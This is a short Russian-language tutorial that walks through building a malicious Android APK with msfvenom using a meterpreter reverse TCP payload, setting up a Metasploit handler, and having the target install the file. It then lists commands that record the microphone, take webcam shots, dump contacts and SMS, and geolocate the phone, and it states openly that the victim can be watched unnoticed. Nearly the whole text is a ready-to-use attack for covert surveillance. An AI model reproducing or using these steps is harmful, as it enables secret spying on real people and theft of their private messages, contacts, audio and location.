Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig: msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shell.apk Code msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shell.apk После выполнения команды в корневой директории будет создан файл shell.apk. Далее необходимо запустить msfconsole. msfconsole Code msfconsole После этого последовательно выполняем все команды: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST ВашIP set LPORT 4444 exploit Code use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST ВашIP set LPORT 4444 exploit После этого, человек должен запусить shell.apk. Некоторые полезные команды: record_mic webcam_snap webcam_stream dump_contacts dump_sms geolocate Code record_mic webcam_snap webcam_stream dump_contacts dump_sms geolocate После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.